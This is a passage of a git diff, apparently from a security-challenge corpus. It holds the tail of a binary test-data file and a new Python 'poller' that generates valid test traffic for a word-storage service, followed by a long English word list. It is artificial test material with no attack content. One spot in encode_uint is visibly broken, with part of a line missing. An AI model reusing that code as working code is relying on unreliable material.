08hello617\xffC\x26F8\x08hello618\xffC\x26F8\x08hello619\xffC\x26F8\x08hello620\xffC\x26F8\x08hello621\xffC\x26F8\x08hello622\xffC\x26F8\x08hello623\xffC\x26F8\x08hello624\xffC\x26F8\x08hello625\xffC\x26F8\x08hello626\xffC\x26F8\x08hello627\xffC\x26F8\x08hello628\xffC\x26F8\x08hello629\xffC\x26F8\x08hello630\xffC\x26F8\x08hello631\xffC\x26F8\x08hello632\xffC\x26F8\x08hello633\xffC\x26F8\x08hello634\xffC\x26F8\x08hello635\xffC\x26F8\x08hello636\xffC\x26F8\x08hello637\xffC\x26F8\x08hello638\xffC\x26F8\x08hello639\xffC\x26F8\x08hello640\xffC\x26F8\x08hello641\xffC\x26F8\x08hello642\xffC\x26F8\x08hello643\xffC\x26F8\x08hello644\xffC\x26F8\x08hello645\xffC\x26F8\x08hello646\xffC\x26F8\x08hello647\xffC\x26F8\x08hello648\xffC\x26F8\x08hello649\xffC\x26F8\x08hello650\xffC\x26F8\x08hello651\xffC\x26F8\x08hello652\xffC\x26F8\x08hello653\xffC\x26F8\x08hello654\xffC\x26F8\x08hello655\xffC\x26F8\x08hello656\xffC\x26F8\x08hello657\xffC\x26F8\x08hello658\xffC\x26F8\x08hello659\xffC\x26F8\x08hello660\xffC\x26F8\x08hello661\xffC\x26F8\x08hello662\xffC\x26F8\x08hello663\xffC\x26F8\x08hello664\xffC\x26F8\x08hello665\xffC\x26F8\x08hello666\xffC\x26F8\x08hello667\xffC\x26F8\x08hello668\xffC\x26F8\x08hello669\xffC\x26F8\x08hello670\xffC\x26F8\x08hello671\xffC\x26F8\x08hello672\xffC\x26F8\x08hello673\xffC\x26F8\x08hello674\xffC\x26F8\x08hello675\xffC\x26F8\x08hello676\xffC\x26F8\x08hello677\xffC\x26F8\x08hello678\xffC\x26F8\x08hello679\xffC\x26F8\x08hello680\xffC\x26F8\x08hello681\xffC\x26F8\x08hello682\xffC\x26F8\x08hello683\xffC\x26F8\x08hello684\xffC\x26F8\x08hello685\xffC\x26F8\x08hello686\xffC\x26F8\x08hello687\xffC\x26F8\x08hello688\xffC\x26F8\x08hello689\xffC\x26F8\x08hello690\xffC\x26F8\x08hello691\xffC\x26F8\x08hello692\xffC\x26F8\x08hello693\xffC\x26F8\x08hello694\xffC\x26F8\x08hello695\xffC\x26F8\x08hello696\xffC\x26F8\x08hello697\xffC\x26F8\x08hello698\xffC\x26F8\x08hello699\xffC\x26F8\x08hello700\xffC\x26F8\x08hello701\xffC\x26F8\x08hello702\xffC\x26F8\x08hello703\xffC\x26F8\x08hello704\xffC\x26F8\x08hello705\xffC\x26F8\x08hello706\xffC\x26F8\x08hello707\xffC\x26F8\x08hello708\xffC\x26F8\x08hello709\xffC\x26F8\x08hello710\xffC\x26F8\x08hello711\xffC\x26F8\x08hello712\xffC\x26F8\x08hello713\xffC\x26F8\x08hello714\xffC\x26F8\x08hello715\xffC\x26F8\x08hello716\xffC\x26F8\x08hello717\xffC\x26F8\x08hello718\xffC\x26F8\x08hello719\xffC\x26F8\x08hello720\xffC\x26F8\x08hello721\xffC\x26F8\x08hello722\xffC\x26F8\x08hello723\xffC\x26F8\x08hello724\xffC\x26F8\x08hello725\xffC\x26F8\x08hello726\xffC\x26F8\x08hello727\xffC\x26F8\x08hello728\xffC\x26F8\x08hello729\xffC\x26F8\x08hello730\xffC\x26F8\x08hello731\xffC\x26F8\x08hello732\xffC\x26F8\x08hello733\xffC\x26F8\x08hello734\xffC\x26F8\x08hello735\xffC\x26F8\x08hello736\xffC\x26F8\x08hello737\xffC\x26F8\x08hello738\xffC\x26F8\x08hello739\xffC\x26F8\x08hello740\xffC\x26F8\x08hello741\xffC\x26F8\x08hello742\xffC\x26F8\x08hello743\xffC\x26F8\x08hello744\xffC\x26F8\x08hello745\xffC\x26F8\x08hello746\xffC\x26F8\x08hello747\xffC\x26F8\x08hello748\xffC\x26F8\x08hello749\xffC\x26F8\x08hello750\xffC\x26F8\x08hello751\xffC\x26F8\x08hello752\xffC\x26F8\x08hello753\xffC\x26F8\x08hello754\xffC\x26F8\x08hello755\xffC\x26F8\x08hello756\xffC\x26F8\x08hello757\xffC\x26F8\x08hello758\xffC\x26F8\x08hello759\xffC\x26F8\x08hello760\xffC\x26F8\x08hello761\xffC\x26F8\x08hello762\xffC\x26F8\x08hello763\xffC\x26F8\x08hello764\xffC\x26F8\x08hello765\xffC\x26F8\x08hello766\xffC\x26F8\x08hello767\xffC\x26F8\x08hello768\xffC\x26F8\x08hello769\xffC\x26F8\x08hello770\xffC\x26F8\x08hello771\xffC\x26F8\x08hello772\xffC\x26F8\x08hello773\xffC\x26F8\x08hello774\xffC\x26F8\x08hello775\xffC\x26F8\x08hello776\xffC\x26F8\x08hello777\xffC\x26F8\x08hello778\xffC\x26F8\x08hello779\xffC\x26F8\x08hello780\xffC\x26F8\x08hello781\xffC\x26F8\x08hello782\xffC\x26F8\x08hello783\xffC\x26F8\x08hello784\xffC\x26F8\x08hello785\xffC\x26F8\x08hello786\xffC\x26F8\x08hello787\xffC\x26F8\x08hello788\xffC\x26F8\x08hello789\xffC\x26F8\x08hello790\xffC\x26F8\x08hello791\xffC\x26F8\x08hello792\xffC\x26F8\x08hello793\xffC\x26F8\x08hello794\xffC\x26F8\x08hello795\xffC\x26F8\x08hello796\xffC\x26F8\x08hello797\xffC\x26F8\x08hello798\xffC\x26F8\x08hello799\xffC\x26F8\x08hello800 + +800[\x00\x01]* + + diff --git a/exclude/FUN/poller/for-testing/machine.py b/exclude/FUN/poller/for-testing/machine.py new file mode 100644 index 000000000..bbfe60f01 --- /dev/null +++ b/exclude/FUN/poller/for-testing/machine.py @@ -0,0 +1,11853 @@ +from generator.actions import Actions +import random +import re +import string +import struct + +def random_alnum(size): + return ''.join([random.choice(string.ascii_letters + string.digits) for x in xrange(size)]) + +class Fun(Actions): + def encode_uint(self, v): + if v < 0x80: + return chr(v) + elif v < 0x7f00: + return struct.pack('>H', v | 0x8000) + else: + return struct.pack(' 31: + self.write(self.encode_uint(len(s))) + return False + else: + self.write(self.encode_uint(len(s)) + s) + return True + + def recv_string(self, s): + s = self.encode_uint(len(s)) + s + self.read(length=len(s), expect=s) + + def menu1(self): + pass + + def menu2(self): + pass + + def start(self): + self.state['words'] = list(words) + + def end(self): + self.send_uint(0) + self.recv_uint(0) + + def do_reprotect1(self): + self.send_uint(0x35897932) + self.send_uint(random.randint(0, 0xFFFFFFFF)) + self.recv_uint(0) + + def do_reprotect2(self): + self.do_reprotect1() + + def do_add_word1(self): + self.send_uint(0x38462643) + word = random.choice(self.state['words']) + '_' + random_alnum(5) + if self.send_string(word) and len(word) >= 9: + self.recv_uint(0) + self.state['words'].append(word) + else: + self.recv_uint(1) + + def do_add_word2(self): + self.do_add_word1() + + def do_search1(self): + partial = self.chance(0.5) + if partial: + self.send_uint(0x69399376) + else: + self.send_uint(0x69399375) + i = random.randint(0, len(self.state['words']) - 1) + self.send_string(self.state['words'][i]) + self.recv_uint(0) + if not partial: + self.recv_uint(i) + else: + for x in xrange(len(self.state['words'])): + if self.state['words'][x].startswith(self.state['words'][i]): + self.recv_uint(x) + break + + def do_search2(self): + self.do_search1() + + def do_generate1(self): + self.send_uint(0x2884) + self.recv_uint(0) + self.send_uint(0x35897932) + self.send_uint(random.randint(0, 0xffffffff)) + self.read(delim='\0') + + def do_generate2(self): + self.do_generate1() + + def do_training1(self): + self.send_uint(0x1971) + self.recv_uint(0) + self.send_uint(0 if self.chance(0.5) else 1) + self.read(delim='\0') + + def do_training2(self): + self.do_training1() + + def do_sort(self): + reverse = self.chance(0.5) + self.send_uint(0x38327950) + self.send_uint(1 if reverse else 0) + self.recv_uint(0) + self.state['words'] = list(sorted(self.state['words'], reverse=reverse)) + +words = [ + "lighthearted", + "housebroken", + "crown princess", + "include", + "countenance", + "boozer", + "carve", + "cheesecloth", + "fanciful", + "butterfingers", + "ambitious", + "he'd", + "gutsy", + "local", + "fluidity", + "low-paid", + "fallacious", + "chilly", + "dirty", + "cutlery", + "empress", + "bigot", + "gulch", + "incessantly", + "exhaust", + "lotion", + "carnivore", + "bigamy", + "emerge", + "bikini", + "excitement", + "lose", + "Episcopal Church", + "fool", + "ambush", + "fare", + "fractionally", + "ethereal", + "gesticulate", + "epaulet", + "communicable", + "continuity", + "inoculation", + "excrete", + "contradictory", + "assignment", + "ecological", + "inflict", + "loyal", + "free will", + "educational", + "faculty", + "business administration", + "Europe", + "hang", + "lily", + "foliage", + "humanize", + "brief", + "grand piano", + "computation", + "camellia", + "disapprovingly", + "heartbreaking", + "litigation", + "algebra", + "C-section", + "ABC", + "heyday", + "grin", + "bedpan", + "fog", + "akin", + "long-range", + "at", + "clutches", + "delay", + "hen", + "godforsaken", + "disclose", + "backlash", + "duffel bag", + "biting", + "elevation", + "discord", + "gnat", + "effort", + "hot seat", + "creditable", + "croon", + "equator", + "dilute", + "duplicate", + "funeral director", + "apartheid", + "family values", + "abashed", + "footage", + "lost", + "detain", + "journalism", + "Caucasian", + "blot", + "hangers-on", + "intelligible", + "looter", + "arraignment", + "easygoing", + "aerodynamic", + "doesn't", + "guy", + "flub", + "dismissal", + "lucidity", + "informed", + "forgery", + "indifferently", + "hot tub", + "marinade", + "inequity", + "indelibly", + "limousine", + "imaginable", + "chicken pox", + "acquisition", + "delayed", + "hijacker", + "edible", + "expenses", + "he", + "dolly", + "big cheese", + "developing", + "glare", + "dissolve", + "forfeit", + "christening", + "avarice", + "devious", + "forte", + "forward-looking", + "abhorrent", + "alleviate", + "hairy", + "distinction", + "franc", + "convoluted", + "four-letter word", + "mallet", + "anatomy", + "arsenal", + "class", + "courageously", + "exit", + "laundry room", + "kid", + "associate professor", + "guzzler", + "jest", + "first aid", + "irritation", + "inconspicuous", + "avalanche", + "Democrat", + "cornerstone", + "heel", + "infertile", + "in-house", + "inhospitable", + "count", + "extremity", + "consume", + "hoe", + "insect", + "disdain", + "Antarctic", + "hospitalization", + "glasses", + "combine", + "judiciary", + "carelessness", + "jubilant", + "brash", + "classic", + "crucifixion", + "impossibility", + "call", + "covertly", + "flying", + "chip", + "agonizingly", + "albeit", + "beside", + "die", + "homework", + "intestine", + "curve", + "aside", + "bonfire", + "Inc.", + "geometrically", + "construct", + "justify", + "generation gap", + "currency", + "imitation", + "frustrated", + "horoscope", + "distinctively", + "anyway", + "am", + "abominable", + "imperialism", + "discouraged", + "concrete", + "counselor", + "arise", + "creole", + "desecrate", + "essential", + "darken", + "field day", + "confine", + "blowtorch", + "forlorn", + "full-time", + "craft", + "Dumpster", + "ingratitude", + "fatality", + "imperial", + "exclusively", + "blank check", + "elementary school", + "Antarctica", + "arm", + "convey", + "appearance", + "gerrymandering", + "frankness", + "heavens", + "French bread", + "Achilles' heel", + "frizz", + "mammal", + "Black", + "heave", + "deportation", + "gestation", + "guaranty", + "assertiveness", + "flowerbed", + "headlines", + "headhunter", + "inflationary", + "bulletproof", + "learn", + "foreclose", + "joyriding", + "colorful", + "dreadfully", + "adequately", + "assembly line", + "insistently", + "cover", + "dilemma", + "dawn", + "battered", + "land mine", + "junk", + "glandular", + "flour", + "intermarriage", + "donate", + "almost", + "loft", + "life preserver", + "decrease", + "inscribe", + "leek", + "ambassador", + "dismally", + "fossil fuel", + "fingerprint", + "choice", + "gonna", + "fart", + "funnel cloud", + "large-scale", + "favoritism", + "hale", + "diseased", + "inaccurate", + "crate", + "bird", + "athlete", + "evade", + "gelding", + "atheist", + "handbook", + "hangover", + "affectionately", + "mar", + "killing", + "cavalry", + "ago", + "manslaughter", + "lottery", + "accreditation", + "cloth", + "bylaw", + "disclaim", + "budding", + "croak", + "hernia", + "audacity", + "avoid", + "circumstance", + "fetch", + "magician", + "dump truck", + "consolation", + "genital", + "foreground", + "cleanse", + "displace", + "host", + "catnip", + "knuckle", + "grad school", + "briny", + "curt", + "affectation", + "madness", + "incorporated", + "bumper sticker", + "electrician", + "expose", + "astutely", + "believable", + "cultural", + "lubrication", + "imbue", + "ink", + "humdrum", + "lunatic", + "keenness", + "depressed", + "injurious", + "bored", + "calibrate", + "hark", + "aimlessly", + "leapt", + "elicit", + "convoy", + "kowtow", + "Jew", + "impale", + "axle", + "derision", + "icing", + "accord", + "expressway", + "homeroom", + "hit-and-run", + "chiffon", + "halibut", + "eyebrow", + "entirely", + "habitual", + "girder", + "immune system", + "competitor", + "inherent", + "diction", + "acclaimed", + "context", + "curable", + "high roller", + "capital letter", + "alcohol", + "government", + "luxuriate", + "canvass", + "death penalty", + "hanger-on", + "corpulent", + "ace", + "cherish", + "inconclusive", + "decoration", + "hatchet", + "appallingly", + "cheapskate", + "aboard", + "defamation", + "indicator", + "amid", + "inexpensively", + "footwork", + "gristle", + "drive", + "elopement", + "justifiably", + "furl", + "blizzard", + "illegible", + "gentle", + "booze", + "kung fu", + "endow", + "aid", + "epic", + "furor", + "dole", + "diagnostic", + "insulate", + "drinking", + "involve", + "baby boom", + "buffoon", + "cinnamon", + "college", + "broad-minded", + "exhilarating", + "estimated", + "levitation", + "Deep South", + "conditionally", + "crisply", + "char", + "equine", + "frivolously", + "hash browns", + "ID card", + "jig", + "intentional", + "biscuit", + "credible", + "laborious", + "explanatory", + "dawdle", + "disclosure", + "long johns", + "cottonwood", + "clear", + "carrier", + "cobblestone", + "halftime", + "chide", + "incisive", + "lob", + "freeload", + "electrode", + "brag", + "dangerously", + "flagstone", + "announce", + "capriciously", + "hookey", + "crackdown", + "combatant", + "grand total", + "congratulatory", + "faultless", + "burglary", + "humbly", + "fluoride", + "inland", + "affect", + "embryo", + "h'm", + "fireplace", + "constipation", + "dew", + "likable", + "electoral", + "credit", + "downplay", + "Mars", + "coagulation", + "airliner", + "gloat", + "comeuppance", + "cast-iron", + "admonish", + "highlighter", + "carpeted", + "doomed", + "grayish", + "accommodation", + "affirmatively", + "cobweb", + "exhaustively", + "contention", + "infliction", + "apparition", + "lonesome", + "anguish", + "coward", + "chairwoman", + "bologna", + "customarily", + "enchanting", + "maid of honor", + "jaw", + "improperly", + "entrance ramp", + "handlebar", + "authorization", + "beginner", + "groupie", + "inflexibly", + "exploratory", + "gleaming", + "flash flood", + "depend", + "gruffly", + "guileless", + "glisten", + "competence", + "hyperactive", + "enjoyable", + "garish", + "collaborate", + "amazingly", + "absent-minded", + "elude", + "electric", + "drawing", + "childproof", + "buff", + "abbreviation", + "astringent", + "alkali", + "adoption", + "bestial", + "hatchback", + "allay", + "credibility", + "foretaste", + "exceptionally", + "aesthetics", + "dehydration", + "company", + "guzzle", + "deacon", + "inefficiently", + "majorly", + "compulsive", + "brokerage", + "chin", + "Good Friday", + "correlate", + "abacus", + "bore", + "categorically", + "fez", + "actuality", + "cirrhosis", + "compelling", + "gauche", + "debt", + "lumbering", + "adjournment", + "engender", + "blatant", + "hard currency", + "marketable", + "disbelief", + "home", + "delicious", + "godmother", + "confidential", + "bead", + "advent", + "macrocosm", + "howdy", + "incorporate", + "landlady", + "knotty", + "devoutly", + "beautifully", + "cervical", + "contrast", + "frail", + "Down's syndrome", + "behalf", + "attentively", + "coworker", + "cherub", + "disfigure", + "fix", + "hesitate", + "fax", + "indecency", + "foyer", + "emphatic", + "cadaver", + "chipmunk", + "fathom", + "freshwater", + "h", + "balm", + "internship", + "attainable", + "fluctuate", + "are", + "downright", + "gullibility", + "inkling", + "cooperation", + "bachelor", + "fourthly", + "hankie", + "indictment", + "lover", + "gradient", + "hitch", + "gassy", + "computer", + "broke", + "fortune", + "brighten", + "gaseous", + "crook", + "health food", + "languorous", + "hound", + "disproportionately", + "humanist", + "homeowner", + "burning", + "gasket", + "deign", + "brothel", + "leggy", + "jockey", + "ambivalent", + "juncture", + "embezzle", + "jack-in-the-box", + "ankle", + "clef", + "kindhearted", + "aura", + "floodgate", + "coercive", + "arose", + "flicker", + "influential", + "limb", + "common sense", + "callus", + "certified check", + "crooked", + "decree", + "irresistible", + "gangrene", + "anytime", + "deserve", + "instructive", + "drunkenness", + "humanely", + "far-out", + "expendable", + "cheerfully", + "kettle", + "clot", + "federate", + "borne", + "approve", + "accusing", + "accommodate", + "borrow", + "daylight", + "explore", + "cure", + "letterhead", + "license", + "exonerate", + "crew cut", + "coincide", + "cheapness", + "browbeat", + "adjustable", + "ingeniously", + "ice cream", + "lax", + "endurance", + "dispirited", + "boo", + "joke", + "frieze", + "E", + "chef", + "evolutionary", + "admiration", + "dear", + "manure", + "effectively", + "dismount", + "hypodermic", + "impolite", + "equality", + "manufacturer", + "Congress", + "cease-fire", + "divided highway", + "candor", + "cognac", + "arrive", + "itinerary", + "food", + "attractiveness", + "inflated", + "hither", + "attorney general", + "indiscriminate", + "contractor", + "exuberant", + "disrespectful", + "flashback", + "arrogance", + "eaves", + "grating", + "folder", + "attribute", + "cattle", + "invincible", + "distract", + "hotel", + "digress", + "dissolute", + "lens", + "flora", + "hopelessness", + "crafty", + "assist", + "gnarled", + "district attorney", + "citrus", + "cholera", + "bubble", + "engraving", + "lieutenant", + "fuse", + "contempt", + "five", + "creek", + "glade", + "improvisation", + "core", + "histrionic", + "bummer", + "civilian", + "acute angle", + "leaflet", + "disruptive", + "ghoul", + "eyesight", + "civil liberties", + "deftly", + "adulterate", + "cola", + "instinctive", + "grammatically", + "kitten", + "grandchild", + "ardent", + "communication", + "limo", + "calendar", + "fizzy", + "clitoris", + "fiddle", + "euthanasia", + "daring", + "itchiness", + "manifold", + "inexperience", + "anxious", + "fraud", + "daughter", + "depraved", + "lake", + "Capitol", + "emperor", + "bed", + "injunction", + "acceleration", + "driving", + "concede", + "haircut", + "deport", + "grid", + "extortion", + "leggings", + "eye-catching", + "freight", + "erupt", + "bogged down", + "broken-down", + "aisle", + "favorably", + "beaker", + "dish", + "confirmation", + "inflammable", + "edge", + "froth", + "drunkard", + "knitting needle", + "entrance", + "forethought", + "clay", + "excruciatingly", + "governor", + "hesitant", + "Earth", + "dossier", + "idol", + "chew", + "leg", + "despondent", + "attach", + "jog", + "Apr.", + "corrode", + "crowning", + "international", + "desegregate", + "holder", + "brigade", + "hairnet", + "Big Apple", + "disorientation", + "ladybug", + "'cause", + "element", + "distinctly", + "cinch", + "catwalk", + "exclusive", + "extraterrestrial", + "Easter egg", + "green", + "cashmere", + "boredom", + "finicky", + "authority", + "deceptively", + "magnification", + "dutiful", + "impervious", + "amber", + "corruptible", + "deadpan", + "indecision", + "clink", + "manicure", + "domesticate", + "handicap", + "deafen", + "flip", + "formality", + "acrimony", + "authoritarian", + "figurehead", + "diabolical", + "digression", + "deformation", + "crept", + "capital", + "FYI", + "civilized", + "infrastructure", + "disheveled", + "devotedly", + "elastic", + "foreign", + "kick", + "curator", + "barrier", + "accumulation", + "abstract", + "grapevine", + "bulldog", + "close-knit", + "in-between", + "facetious", + "chow", + "cheesecake", + "doughnut", + "backlog", + "joy", + "bilingual", + "backdrop", + "forever", + "effervescent", + "clinically", + "horseplay", + "generosity", + "hall", + "dangle", + "cleric", + "floor", + "expedite", + "debilitate", + "bold", + "farsighted", + "commuter", + "flannel", + "adopt", + "asexual", + "embankment", + "appendicitis", + "insides", + "gurgling", + "angelically", + "anticipation", + "kW", + "eventuality", + "liaison", + "dab", + "liquid", + "hanky-panky", + "dependency", + "crossing", + "linger", + "cram", + "algorithm", + "jeans", + "handshake", + "Boy Scout", + "fulfillment", + "chalk", + "barricade", + "inflammation", + "frugality", + "incomplete", + "catching", + "functional", + "drawback", + "fragile", + "evaporation", + "debase", + "growl", + "gynecology", + "aerial", + "harmoniously", + "holiness", + "billfold", + "efficient", + "intermission", + "inwards", + "interest", + "high-strung", + "laden", + "grouse", + "interwove", + "legislative", + "czar", + "firm", + "contour", + "creature", + "counter", + "indolence", + "gaggle", + "inferno", + "libel", + "exterior", + "frat", + "full", + "bet", + "conservatism", + "hate crime", + "diaper", + "demanding", + "dupe", + "enrollment", + "designing", + "fibrous", + "cagey", + "hawk", + "gait", + "duke", + "detailed", + "dollop", + "convince", + "inning", + "introvert", + "former", + "cross section", + "liquor", + "guacamole", + "erase", + "mammoth", + "fish", + "ironing", + "deliver", + "impulsiveness", + "birthrate", + "erect", + "hung", + "finely", + "data processing", + "eardrum", + "internationally", + "confetti", + "babble", + "camel", + "interestingly", + "car wash", + "blob", + "devise", + "accustomed", + "exhilaration", + "biochemistry", + "debate", + "marionette", + "laurel", + "gangplank", + "diminutive", + "lucrative", + "listless", + "famous", + "convinced", + "haven't", + "guts", + "mandarin orange", + "big-league", + "defensible", + "duo", + "commerce", + "lesser", + "climb", + "chap", + "impair", + "accumulate", + "chipper", + "certification", + "collusion", + "freshman", + "delicacy", + "energies", + "lizard", + "astonished", + "debasement", + "fidget", + "income tax", + "echo", + "fishbowl", + "approachable", + "cookie", + "key ring", + "cackle", + "attorney", + "cash cow", + "accrue", + "different", + "everyplace", + "dwarves", + "crib sheet", + "learning", + "hyphenation", + "condition", + "dork", + "cabaret", + "fragility", + "Jul.", + "crystallization", + "grab", + "furrow", + "fast lane", + "bidder", + "Father's Day", + "impossibly", + "disgusting", + "basket", + "gripping", + "furnishings", + "broker", + "atomic bomb", + "go-ahead", + "buck", + "confederate", + "elation", + "imminently", + "filament", + "degree", + "bolster", + "clobber", + "articulately", + "gene", + "inconsequential", + "electron", + "destroy", + "demented", + "businesslike", + "flirtation", + "jointly", + "hole", + "diamond", + "indict", + "lie detector", + "answer", + "feast", + "experimental", + "love seat", + "conscious", + "goulash", + "consulate", + "butterscotch", + "dispassionate", + "duplication", + "dread", + "equinox", + "hydrogen", + "lazy", + "galoshes", + "fictitious", + "guess", + "lineup", + "booby-trap", + "improve", + "laxity", + "Hall of Fame", + "gawk", + "ferocious", + "courts-martial", + "breeder", + "countable", + "gal", + "cutlet", + "graze", + "gallivant", + "form letter", + "analogy", + "lush", + "elemental", + "derivation", + "exemplary", + "demolish", + "abscess", + "kilobyte", + "beeline", + "grimy", + "cleverness", + "illegibly", + "hike", + "magpie", + "indolent", + "farthest", + "bourbon", + "bosom", + "ingratiating", + "love story", + "contents", + "explicit", + "font", + "flea market", + "jagged", + "emirate", + "flaunt", + "adage", + "invoke", + "fallible", + "burn", + "bulb", + "indiscriminately", + "godchild", + "inspector", + "annotated", + "ejaculation", + "effect", + "behold", + "genealogist", + "importantly", + "insertion", + "asterisk", + "breadbasket", + "ancestry", + "balanced", + "horrible", + "file", + "cutback", + "gusty", + "first-degree", + "irreconcilable", + "avant-garde", + "I've", + "consort", + "institutional", + "blooper", + "intently", + "fishing rod", + "dweller", + "elliptical", + "ditto", + "gallant", + "Irish", + "exacerbate", + "bullfighting", + "location", + "implicitly", + "dazzle", + "English", + "incident", + "enlist", + "irritate", + "cataclysmic", + "hair dryer", + "curricula", + "clueless", + "horrifying", + "gyration", + "diver", + "insurance", + "longitude", + "casket", + "curly", + "genitals", + "knives", + "circuitous", + "Mar.", + "godchildren", + "bigoted", + "drab", + "informally", + "bulge", + "compromise", + "keeping", + "greet", + "crumble", + "allegedly", + "inspiring", + "buoyant", + "bellow", + "commercially", + "indulgent", + "bookie", + "humiliated", + "chauffeur", + "divorce", + "cycle", + "alibi", + "degenerate", + "corpse", + "dressmaker", + "abet", + "economy", + "dues", + "loyalty", + "grade school", + "crosstown", + "combative", + "city", + "atonement", + "gunfire", + "breakthrough", + "dresser", + "jet propulsion", + "delighted", + "business card", + "diversify", + "cinematographer", + "incompletely", + "bouncer", + "confidence", + "fermented", + "estimation", + "freshly", + "inmate", + "fortitude", + "departmental", + "exponent", + "coat", + "fauna", + "hard-hitting", + "binoculars", + "fine", + "boat", + "Mace", + "locust", + "homogeneous", + "mare", + "bottom", + "appealing", + "alarmist", + "heaping", + "liturgy", + "among", + "deep", + "gangling", + "gutter", + "grotto", + "delivery", + "guesswork", + "degeneration", + "arched", + "dealt", + "commend", + "luxuriously", + "lima bean", + "disorderly", + "average", + "genealogical", + "greenhouse", + "detention", + "bathe", + "digestion", + "disintegration", + "earthiness", + "cheerfulness", + "absurdity", + "housewife", + "clubhouse", + "late", + "bravery", + "fattening", + "last", + "globetrotter", + "bravely", + "disordered", + "dented", + "great-granddaughter", + "finding", + "booth", + "Cantonese", + "embezzlement", + "abduction", + "feeler", + "choose", + "junk mail", + "contagious", + "indefensible", + "infringe", + "marvel", + "cloak-and-dagger", + "establishment", + "cheery", + "Cabinet", + "accentuate", + "assessment", + "environment", + "made", + "B", + "another", + "calling", + "bustle", + "clergywoman", + "daddy", + "eccentricity", + "darned", + "forgot", + "grungy", + "destructive", + "foreplay", + "complicity", + "inadvertent", + "floor plan", + "caustic", + "eruption", + "all-clear", + "brightness", + "communion", + "amusement", + "clinch", + "discouraging", + "descriptive", + "fanatic", + "knock", + "depict", + "goblet", + "geologist", + "hieroglyphic", + "disjointed", + "depart", + "accordance", + "cordially", + "cake", + "aggression", + "linear", + "antacid", + "buster", + "accuser", + "impressionistic", + "grass roots", + "antiseptic", + "commemorative", + "increased", + "charcoal", + "evolution", + "fox", + "barely", + "doubtfully", + "groundswell", + "absence", + "choreograph", + "blunt", + "drip-dry", + "disparity", + "admire", + "consuming", + "many", + "flood", + "competent", + "flimsy", + "applied", + "bomber", + "conceit", + "dispose", + "irritant", + "half", + "literary", + "boxing", + "freelance", + "interface", + "first cousin", + "by", + "forgo", + "acquire", + "abhorrence", + "backyard", + "drink", + "macabre", + "astronomical", + "blister", + "irreproachable", + "folks", + "interconnect", + "brawl", + "incompatible", + "galaxy", + "inside", + "handsomely", + "barbell", + "associate", + "candidate", + "ditch", + "dwelt", + "gyrate", + "curio", + "Libra", + "ages", + "fraught", + "connoisseur", + "cellophane", + "bullshit", + "arrival", + "immobilize", + "heir", + "homicidal", + "beguile", + "gynecological", + "hardware", + "dehydrate", + "idleness", + "lone", + "flared", + "cruel", + "breadwinner", + "crash course", + "brew", + "convenience store", + "home run", + "decently", + "immaculate", + "compile", + "authentic", + "mad", + "acrid", + "fornicate", + "banish", + "godlike", + "dairy cattle", + "dissidence", + "commando", + "bonkers", + "bilaterally", + "bottled", + "decompose", + "come", + "chickadee", + "jade", + "bled", + "Latin American", + "affable", + "frisk", + "inefficient", + "abysmal", + "catty-cornered", + "groggy", + "conventional", + "founder", + "diametrically", + "fresh", + "haphazardly", + "ABC's", + "environmental", + "cover letter", + "globally", + "gymnast", + "condemn", + "craftsmanship", + "liftoff", + "copious", + "artisan", + "gable", + "lingo", + "guillotine", + "culinary", + "concentration camp", + "ingenuity", + "beeswax", + "forwarding address", + "expenditure", + "agonizing", + "glory", + "admonition", + "clash", + "invalid", + "legibility", + "cut-rate", + "disservice", + "grits", + "flick", + "fuel", + "foal", + "blackmail", + "harsh", + "fleeting", + "impress", + "empowerment", + "lunchtime", + "civilization", + "equip", + "magnesium", + "decal", + "better off", + "hierarchical", + "faint", + "dogmatic", + "ate", + "grubby", + "gigabyte", + "anonymously", + "licorice", + "kilo", + "Arctic", + "fold", + "intercept", + "apologetic", + "fishnet", + "deadly", + "cannonball", + "magnetism", + "exposition", + "depth", + "excess", + "gobs", + "float", + "arch", + "hyena", + "intrinsically", + "exorbitant", + "indicative", + "card", + "apparently", + "bend", + "cedar", + "egg", + "insulation", + "imitator", + "free enterprise", + "dazed", + "mainstay", + "disastrous", + "everywhere", + "colloquialism", + "jump-start", + "double-spaced", + "bare", + "downstate", + "briefs", + "ear", + "clerical", + "ideally", + "lesson", + "autopsy", + "edification", + "collected", + "deviant", + "bought", + "faithless", + "clock", + "ghoulish", + "agricultural", + "history", + "goad", + "dismal", + "crevice", + "colt", + "cold-hearted", + "carryout", + "drapery", + "grandiose", + "indecisive", + "apprise", + "Grammy", + "mariner", + "if", + "Judgment Day", + "cramps", + "field", + "express", + "faraway", + "glowingly", + "intramural", + "French", + "hobby", + "fifty-fifty", + "junior", + "flue", + "deceased", + "freckled", + "alumna", + "define", + "glibly", + "gal.", + "asleep", + "glitter", + "identity", + "kindred", + "bloodshed", + "dally", + "callous", + "crazed", + "bookstore", + "cross-eyed", + "control", + "barrage", + "ascent", + "curse", + "dress code", + "fuse box", + "Dutch", + "gape", + "bean", + "cock", + "any", + "explain", + "fermentation", + "dental", + "dribs and drabs", + "I'll", + "commitment", + "aggressiveness", + "cc:", + "bonus", + "annihilate", + "game plan", + "foamy", + "annual", + "copier", + "blackhead", + "bobsled", + "egotism", + "gander", + "limiting", + "emergent", + "incestuous", + "liven", + "accessibility", + "daredevil", + "affix", + "big-time", + "cessation", + "fanfare", + "bigmouth", + "bass guitar", + "dramatist", + "adjudicate", + "blistering", + "constant", + "badminton", + "intimidated", + "incompetence", + "hurry", + "furry", + "discrimination", + "fabrication", + "cherry", + "angular", + "eightieth", + "cynically", + "drudge", + "classics", + "advertiser", + "diagonally", + "family", + "likely", + "lots", + "knitting", + "madam", + "embassy", + "buttermilk", + "manacle", + "junkie", + "initials", + "fallacy", + "gray", + "account", + "dungeon", + "Capricorn", + "harpist", + "cell phone", + "cocky", + "fucked up", + "demonstrate", + "grateful", + "blacksmith", + "dispenser", + "marsupial", + "extraordinary", + "circumvent", + "gumbo", + "authorship", + "beef", + "him", + "awoke", + "everybody", + "discourtesy", + "enthuse", + "dampen", + "berry", + "damaging", + "flip out", + "bounce", + "cosmos", + "clothes", + "animation", + "haunted", + "Dec.", + "aristocratic", + "irregularly", + "girl", + "deity", + "candy", + "boom", + "attract", + "idealism", + "especially", + "divide", + "harbor", + "firearm", + "depreciate", + "cuddle", + "camcorder", + "credence", + "dumpling", + "haddock", + "idiomatic", + "deviation", + "lung", + "keenly", + "detail", + "anthem", + "extradite", + "detente", + "bequeath", + "dude", + "anti-Semitism", + "colorless", + "abbreviate", + "health care", + "blurred", + "immediacy", + "calibration", + "ladies' room", + "jubilation", + "indivisible", + "frequent", + "lethal", + "alight", + "icky", + "keynote", + 